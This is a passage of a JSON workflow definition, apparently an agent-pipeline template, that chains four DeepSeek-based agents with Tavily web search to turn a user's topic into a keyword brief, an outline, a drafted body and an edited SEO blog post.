"Agent:LovelyHeadsOwn"
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"begin": {
|
||||||
|
"downstream": [
|
||||||
|
"Agent:ClearRabbitsScream"
|
||||||
|
],
|
||||||
|
"obj": {
|
||||||
|
"component_name": "Begin",
|
||||||
|
"params": {
|
||||||
|
"enablePrologue": true,
|
||||||
|
"inputs": {},
|
||||||
|
"mode": "conversational",
|
||||||
|
"prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"upstream": []
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"globals": {
|
||||||
|
"sys.conversation_turns": 0,
|
||||||
|
"sys.files": [],
|
||||||
|
"sys.query": "",
|
||||||
|
"sys.user_id": ""
|
||||||
|
},
|
||||||
|
"graph": {
|
||||||
|
"edges": [
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"isHovered": false
|
||||||
|
},
|
||||||
|
"id": "xy-edge__beginstart-Agent:ClearRabbitsScreamend",
|
||||||
|
"source": "begin",
|
||||||
|
"sourceHandle": "start",
|
||||||
|
"target": "Agent:ClearRabbitsScream",
|
||||||
|
"targetHandle": "end"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"isHovered": false
|
||||||
|
},
|
||||||
|
"id": "xy-edge__Agent:ClearRabbitsScreamstart-Agent:BetterSitesSendend",
|
||||||
|
"source": "Agent:ClearRabbitsScream",
|
||||||
|
"sourceHandle": "start",
|
||||||
|
"target": "Agent:BetterSitesSend",
|
||||||
|
"targetHandle": "end"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"isHovered": false
|
||||||
|
},
|
||||||
|
"id": "xy-edge__Agent:BetterSitesSendtool-Tool:SharpPensBurnend",
|
||||||
|
"source": "Agent:BetterSitesSend",
|
||||||
|
"sourceHandle": "tool",
|
||||||
|
"target": "Tool:SharpPensBurn",
|
||||||
|
"targetHandle": "end"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"isHovered": false
|
||||||
|
},
|
||||||
|
"id": "xy-edge__Agent:BetterSitesSendstart-Agent:EagerNailsRemainend",
|
||||||
|
"source": "Agent:BetterSitesSend",
|
||||||
|
"sourceHandle": "start",
|
||||||
|
"target": "Agent:EagerNailsRemain",
|
||||||
|
"targetHandle": "end"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"id": "xy-edge__Agent:EagerNailsRemaintool-Tool:WickedDeerHealend",
|
||||||
|
"source": "Agent:EagerNailsRemain",
|
||||||
|
"sourceHandle": "tool",
|
||||||
|
"target": "Tool:WickedDeerHeal",
|
||||||
|
"targetHandle": "end"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"isHovered": false
|
||||||
|
},
|
||||||
|
"id": "xy-edge__Agent:EagerNailsRemainstart-Agent:LovelyHeadsOwnend",
|
||||||
|
"source": "Agent:EagerNailsRemain",
|
||||||
|
"sourceHandle": "start",
|
||||||
|
"target": "Agent:LovelyHeadsOwn",
|
||||||
|
"targetHandle": "end"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"isHovered": false
|
||||||
|
},
|
||||||
|
"id": "xy-edge__Agent:LovelyHeadsOwnstart-Message:LegalBeansBetend",
|
||||||
|
"source": "Agent:LovelyHeadsOwn",
|
||||||
|
"sourceHandle": "start",
|
||||||
|
"target": "Message:LegalBeansBet",
|
||||||
|
"targetHandle": "end"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"nodes": [
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"enablePrologue": true,
|
||||||
|
"inputs": {},
|
||||||
|
"mode": "conversational",
|
||||||
|
"prologue": "Hi! I'm your SEO blog assistant.\n\nTo get started, please tell me:\n1. What topic you want the blog to cover\n2. Who is the target audience\n3. What you hope to achieve with this blog (e.g., SEO traffic, teaching beginners, promoting a product)\n"
|
||||||
|
},
|
||||||
|
"label": "Begin",
|
||||||
|
"name": "begin"
|
||||||
|
},
|
||||||
|
"id": "begin",
|
||||||
|
"measured": {
|
||||||
|
"height": 48,
|
||||||
|
"width": 200
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 50,
|
||||||
|
"y": 200
|
||||||
|
},
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "left",
|
||||||
|
"targetPosition": "right",
|
||||||
|
"type": "beginNode"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"delay_after_error": 1,
|
||||||
|
"description": "",
|
||||||
|
"exception_comment": "",
|
||||||
|
"exception_default_value": "",
|
||||||
|
"exception_goto": [],
|
||||||
|
"exception_method": null,
|
||||||
|
"frequencyPenaltyEnabled": false,
|
||||||
|
"frequency_penalty": 0.5,
|
||||||
|
"llm_id": "deepseek-chat@DeepSeek",
|
||||||
|
"maxTokensEnabled": false,
|
||||||
|
"max_retries": 3,
|
||||||
|
"max_rounds": 1,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"mcp": [],
|
||||||
|
"message_history_window_size": 12,
|
||||||
|
"outputs": {
|
||||||
|
"content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"parameter": "Precise",
|
||||||
|
"presencePenaltyEnabled": false,
|
||||||
|
"presence_penalty": 0.5,
|
||||||
|
"prompts": [
|
||||||
|
{
|
||||||
|
"content": "The user query is {sys.query}",
|
||||||
|
"role": "user"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"sys_prompt": "# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
|
||||||
|
"temperature": 0.2,
|
||||||
|
"temperatureEnabled": true,
|
||||||
|
"tools": [],
|
||||||
|
"topPEnabled": false,
|
||||||
|
"top_p": 0.75,
|
||||||
|
"user_prompt": "",
|
||||||
|
"visual_files_var": ""
|
||||||
|
},
|
||||||
|
"label": "Agent",
|
||||||
|
"name": "Parse And Keyword Agent"
|
||||||
|
},
|
||||||
|
"dragging": false,
|
||||||
|
"id": "Agent:ClearRabbitsScream",
|
||||||
|
"measured": {
|
||||||
|
"height": 84,
|
||||||
|
"width": 200
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 344.7766966202233,
|
||||||
|
"y": 234.82202253184496
|
||||||
|
},
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "agentNode"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"delay_after_error": 1,
|
||||||
|
"description": "",
|
||||||
|
"exception_comment": "",
|
||||||
|
"exception_default_value": "",
|
||||||
|
"exception_goto": [],
|
||||||
|
"exception_method": null,
|
||||||
|
"frequencyPenaltyEnabled": false,
|
||||||
|
"frequency_penalty": 0.3,
|
||||||
|
"llm_id": "deepseek-chat@DeepSeek",
|
||||||
|
"maxTokensEnabled": false,
|
||||||
|
"max_retries": 3,
|
||||||
|
"max_rounds": 3,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"mcp": [],
|
||||||
|
"message_history_window_size": 12,
|
||||||
|
"outputs": {
|
||||||
|
"content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"parameter": "Balance",
|
||||||
|
"presencePenaltyEnabled": false,
|
||||||
|
"presence_penalty": 0.2,
|
||||||
|
"prompts": [
|
||||||
|
{
|
||||||
|
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
|
||||||
|
"role": "user"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"sys_prompt": "# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
|
||||||
|
"temperature": 0.5,
|
||||||
|
"temperatureEnabled": true,
|
||||||
|
"tools": [
|
||||||
|
{
|
||||||
|
"component_name": "TavilySearch",
|
||||||
|
"name": "TavilySearch",
|
||||||
|
"params": {
|
||||||
|
"api_key": "",
|
||||||
|
"days": 7,
|
||||||
|
"exclude_domains": [],
|
||||||
|
"include_answer": false,
|
||||||
|
"include_domains": [],
|
||||||
|
"include_image_descriptions": false,
|
||||||
|
"include_images": false,
|
||||||
|
"include_raw_content": true,
|
||||||
|
"max_results": 5,
|
||||||
|
"outputs": {
|
||||||
|
"formalized_content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
},
|
||||||
|
"json": {
|
||||||
|
"type": "Array<Object>",
|
||||||
|
"value": []
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"query": "sys.query",
|
||||||
|
"search_depth": "basic",
|
||||||
|
"topic": "general"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"topPEnabled": false,
|
||||||
|
"top_p": 0.85,
|
||||||
|
"user_prompt": "",
|
||||||
|
"visual_files_var": ""
|
||||||
|
},
|
||||||
|
"label": "Agent",
|
||||||
|
"name": "Outline Agent"
|
||||||
|
},
|
||||||
|
"dragging": false,
|
||||||
|
"id": "Agent:BetterSitesSend",
|
||||||
|
"measured": {
|
||||||
|
"height": 84,
|
||||||
|
"width": 200
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 613.4368763415628,
|
||||||
|
"y": 164.3074269048589
|
||||||
|
},
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "agentNode"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"description": "This is an agent for a specific task.",
|
||||||
|
"user_prompt": "This is the order you need to send to the agent."
|
||||||
|
},
|
||||||
|
"label": "Tool",
|
||||||
|
"name": "flow.tool_0"
|
||||||
|
},
|
||||||
|
"dragging": false,
|
||||||
|
"id": "Tool:SharpPensBurn",
|
||||||
|
"measured": {
|
||||||
|
"height": 44,
|
||||||
|
"width": 200
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 580.1877078861457,
|
||||||
|
"y": 287.7669662022325
|
||||||
|
},
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "toolNode"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"delay_after_error": 1,
|
||||||
|
"description": "",
|
||||||
|
"exception_comment": "",
|
||||||
|
"exception_default_value": "",
|
||||||
|
"exception_goto": [],
|
||||||
|
"exception_method": null,
|
||||||
|
"frequencyPenaltyEnabled": false,
|
||||||
|
"frequency_penalty": 0.5,
|
||||||
|
"llm_id": "deepseek-chat@DeepSeek",
|
||||||
|
"maxTokensEnabled": false,
|
||||||
|
"max_retries": 3,
|
||||||
|
"max_rounds": 5,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"mcp": [],
|
||||||
|
"message_history_window_size": 12,
|
||||||
|
"outputs": {
|
||||||
|
"content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"parameter": "Precise",
|
||||||
|
"presencePenaltyEnabled": false,
|
||||||
|
"presence_penalty": 0.5,
|
||||||
|
"prompts": [
|
||||||
|
{
|
||||||
|
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\n\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}",
|
||||||
|
"role": "user"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"sys_prompt": "# Role\n\nYou are the **Body_Agent**, responsible for generating the full content of each section of an SEO-optimized blog based on the provided outline and keyword strategy.\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
|
||||||
|
"temperature": 0.2,
|
||||||
|
"temperatureEnabled": true,
|
||||||
|
"tools": [
|
||||||
|
{
|
||||||
|
"component_name": "TavilySearch",
|
||||||
|
"name": "TavilySearch",
|
||||||
|
"params": {
|
||||||
|
"api_key": "",
|
||||||
|
"days": 7,
|
||||||
|
"exclude_domains": [],
|
||||||
|
"include_answer": false,
|
||||||
|
"include_domains": [],
|
||||||
|
"include_image_descriptions": false,
|
||||||
|
"include_images": false,
|
||||||
|
"include_raw_content": true,
|
||||||
|
"max_results": 5,
|
||||||
|
"outputs": {
|
||||||
|
"formalized_content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
},
|
||||||
|
"json": {
|
||||||
|
"type": "Array<Object>",
|
||||||
|
"value": []
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"query": "sys.query",
|
||||||
|
"search_depth": "basic",
|
||||||
|
"topic": "general"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"topPEnabled": false,
|
||||||
|
"top_p": 0.75,
|
||||||
|
"user_prompt": "",
|
||||||
|
"visual_files_var": ""
|
||||||
|
},
|
||||||
|
"label": "Agent",
|
||||||
|
"name": "Body Agent"
|
||||||
|
},
|
||||||
|
"dragging": false,
|
||||||
|
"id": "Agent:EagerNailsRemain",
|
||||||
|
"measured": {
|
||||||
|
"height": 84,
|
||||||
|
"width": 200
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 889.0614605692713,
|
||||||
|
"y": 247.00973041799065
|
||||||
|
},
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "agentNode"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"description": "This is an agent for a specific task.",
|
||||||
|
"user_prompt": "This is the order you need to send to the agent."
|
||||||
|
},
|
||||||
|
"label": "Tool",
|
||||||
|
"name": "flow.tool_1"
|
||||||
|
},
|
||||||
|
"dragging": false,
|
||||||
|
"id": "Tool:WickedDeerHeal",
|
||||||
|
"measured": {
|
||||||
|
"height": 44,
|
||||||
|
"width": 200
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 853.2006404239659,
|
||||||
|
"y": 364.37541577229143
|
||||||
|
},
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "toolNode"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"delay_after_error": 1,
|
||||||
|
"description": "",
|
||||||
|
"exception_comment": "",
|
||||||
|
"exception_default_value": "",
|
||||||
|
"exception_goto": [],
|
||||||
|
"exception_method": null,
|
||||||
|
"frequencyPenaltyEnabled": false,
|
||||||
|
"frequency_penalty": 0.5,
|
||||||
|
"llm_id": "deepseek-chat@DeepSeek",
|
||||||
|
"maxTokensEnabled": false,
|
||||||
|
"max_retries": 3,
|
||||||
|
"max_rounds": 5,
|
||||||
|
"max_tokens": 4096,
|
||||||
|
"mcp": [],
|
||||||
|
"message_history_window_size": 12,
|
||||||
|
"outputs": {
|
||||||
|
"content": {
|
||||||
|
"type": "string",
|
||||||
|
"value": ""
|
||||||
|
}
|
||||||
|
},
|
||||||
|
"parameter": "Precise",
|
||||||
|
"presencePenaltyEnabled": false,
|
||||||
|
"presence_penalty": 0.5,
|
||||||
|
"prompts": [
|
||||||
|
{
|
||||||
|
"content": "The parse and keyword agent output is {Agent:ClearRabbitsScream@content}\n\nThe Ouline agent output is {Agent:BetterSitesSend@content}\n\nThe Body agent output is {Agent:EagerNailsRemain@content}",
|
||||||
|
"role": "user"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"sys_prompt": "# Role\n\nYou are the **Editor_Agent**, responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n\n",
|
||||||
|
"temperature": 0.2,
|
||||||
|
"temperatureEnabled": true,
|
||||||
|
"tools": [],
|
||||||
|
"topPEnabled": false,
|
||||||
|
"top_p": 0.75,
|
||||||
|
"user_prompt": "",
|
||||||
|
"visual_files_var": ""
|
||||||
|
},
|
||||||
|
"label": "Agent",
|
||||||
|
"name": "Editor Agent"
|
||||||
|
},
|
||||||
|
"dragging": false,
|
||||||
|
"id": "Agent:LovelyHeadsOwn",
|
||||||
|
"measured": {
|
||||||
|
"height": 84,
|
||||||
|
"width": 200
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 1160.3332919804993,
|
||||||
|
"y": 149.50806732882472
|
||||||
|
},
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "agentNode"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"content": [
|
||||||
|
"{Agent:LovelyHeadsOwn@content}"
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"label": "Message",
|
||||||
|
"name": "Response"
|
||||||
|
},
|
||||||
|
"dragging": false,
|
||||||
|
"id": "Message:LegalBeansBet",
|
||||||
|
"measured": {
|
||||||
|
"height": 56,
|
||||||
|
"width": 200
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 1370.6665839609984,
|
||||||
|
"y": 267.0323933738015
|
||||||
|
},
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "messageNode"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"text": "This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don\u2019t need any writing experience. Just provide a topic or short request \u2014 the system will handle the rest.\n\nThe process includes the following key stages:\n\n1. **Understanding your topic and goals**\n2. **Designing the blog structure**\n3. **Writing high-quality content**\n\n\n"
|
||||||
|
},
|
||||||
|
"label": "Note",
|
||||||
|
"name": "Workflow Overall Description"
|
||||||
|
},
|
||||||
|
"dragHandle": ".note-drag-handle",
|
||||||
|
"dragging": false,
|
||||||
|
"height": 205,
|
||||||
|
"id": "Note:SlimyGhostsWear",
|
||||||
|
"measured": {
|
||||||
|
"height": 205,
|
||||||
|
"width": 415
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": -284.3143151688742,
|
||||||
|
"y": 150.47632147913419
|
||||||
|
},
|
||||||
|
"resizing": false,
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "noteNode",
|
||||||
|
"width": 415
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"text": "**Purpose**: \nThis agent reads the user\u2019s input and figures out what kind of blog needs to be written.\n\n**What it does**:\n- Understands the main topic you want to write about \n- Identifies who the blog is for (e.g., beginners, marketers, developers) \n- Determines the writing purpose (e.g., SEO traffic, product promotion, education) \n- Suggests 3\u20135 long-tail SEO keywords related to the topic"
|
||||||
|
},
|
||||||
|
"label": "Note",
|
||||||
|
"name": "Parse And Keyword Agent"
|
||||||
|
},
|
||||||
|
"dragHandle": ".note-drag-handle",
|
||||||
|
"dragging": false,
|
||||||
|
"height": 152,
|
||||||
|
"id": "Note:EmptyChairsShake",
|
||||||
|
"measured": {
|
||||||
|
"height": 152,
|
||||||
|
"width": 340
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 295.04147626768133,
|
||||||
|
"y": 372.2755718118446
|
||||||
|
},
|
||||||
|
"resizing": false,
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "noteNode",
|
||||||
|
"width": 340
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"text": "**Purpose**: \nThis agent builds the blog structure \u2014 just like writing a table of contents before you start writing the full article.\n\n**What it does**:\n- Suggests a clear blog title that includes important keywords \n- Breaks the article into sections using H2 and H3 headings (like a professional blog layout) \n- Assigns 1\u20132 recommended keywords to each section to help with SEO \n- Follows the writing goal and target audience set in the previous step"
|
||||||
|
},
|
||||||
|
"label": "Note",
|
||||||
|
"name": "Outline Agent"
|
||||||
|
},
|
||||||
|
"dragHandle": ".note-drag-handle",
|
||||||
|
"dragging": false,
|
||||||
|
"height": 146,
|
||||||
|
"id": "Note:TallMelonsNotice",
|
||||||
|
"measured": {
|
||||||
|
"height": 146,
|
||||||
|
"width": 343
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 598.5644991893463,
|
||||||
|
"y": 5.801054564756448
|
||||||
|
},
|
||||||
|
"resizing": false,
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "noteNode",
|
||||||
|
"width": 343
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"text": "**Purpose**: \nThis agent is responsible for writing the actual content of the blog \u2014 paragraph by paragraph \u2014 based on the outline created earlier.\n\n**What it does**:\n- Looks at each H2/H3 section in the outline \n- Writes 150\u2013220 words of clear, helpful, and well-structured content per section \n- Includes the suggested SEO keywords naturally (not keyword stuffing) \n- Uses real examples or facts if needed (by calling a web search tool like Tavily)"
|
||||||
|
},
|
||||||
|
"label": "Note",
|
||||||
|
"name": "Body Agent"
|
||||||
|
},
|
||||||
|
"dragHandle": ".note-drag-handle",
|
||||||
|
"dragging": false,
|
||||||
|
"height": 137,
|
||||||
|
"id": "Note:RipeCougarsBuild",
|
||||||
|
"measured": {
|
||||||
|
"height": 137,
|
||||||
|
"width": 319
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 860.4854129814981,
|
||||||
|
"y": 427.2196835690842
|
||||||
|
},
|
||||||
|
"resizing": false,
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "noteNode",
|
||||||
|
"width": 319
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"data": {
|
||||||
|
"form": {
|
||||||
|
"text": "**Purpose**: \nThis agent reviews the entire blog draft to make sure it is smooth, professional, and SEO-friendly. It acts like a human editor before publishing.\n\n**What it does**:\n- Polishes the writing: improves sentence clarity, fixes awkward phrasing \n- Makes sure the content flows well from one section to the next \n- Double-checks keyword usage: are they present, natural, and not overused? \n- Verifies the blog structure (H1, H2, H3 headings) is correct \n- Adds two key SEO elements:\n - **Meta Title** (shows up in search results)\n - **Meta Description** (summary for Google and social sharing)"
|
||||||
|
},
|
||||||
|
"label": "Note",
|
||||||
|
"name": "Editor Agent"
|
||||||
|
},
|
||||||
|
"dragHandle": ".note-drag-handle",
|
||||||
|
"height": 146,
|
||||||
|
"id": "Note:OpenTurkeysSell",
|
||||||
|
"measured": {
|
||||||
|
"height": 146,
|
||||||
|
"width": 320
|
||||||
|
},
|
||||||
|
"position": {
|
||||||
|
"x": 1129,
|
||||||
|
"y": -30
|
||||||
|
},
|
||||||
|
"resizing": false,
|
||||||
|
"selected": false,
|
||||||
|
"sourcePosition": "right",
|
||||||
|
"targetPosition": "left",
|
||||||
|
"type": "noteNode",
|
||||||
|
"width": 320
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
"history": [],
|
||||||
|
"messages": [],
|
||||||
|
"path": [],
|
||||||
|
"retrieval": []
|
||||||
|
},
|
||||||
|
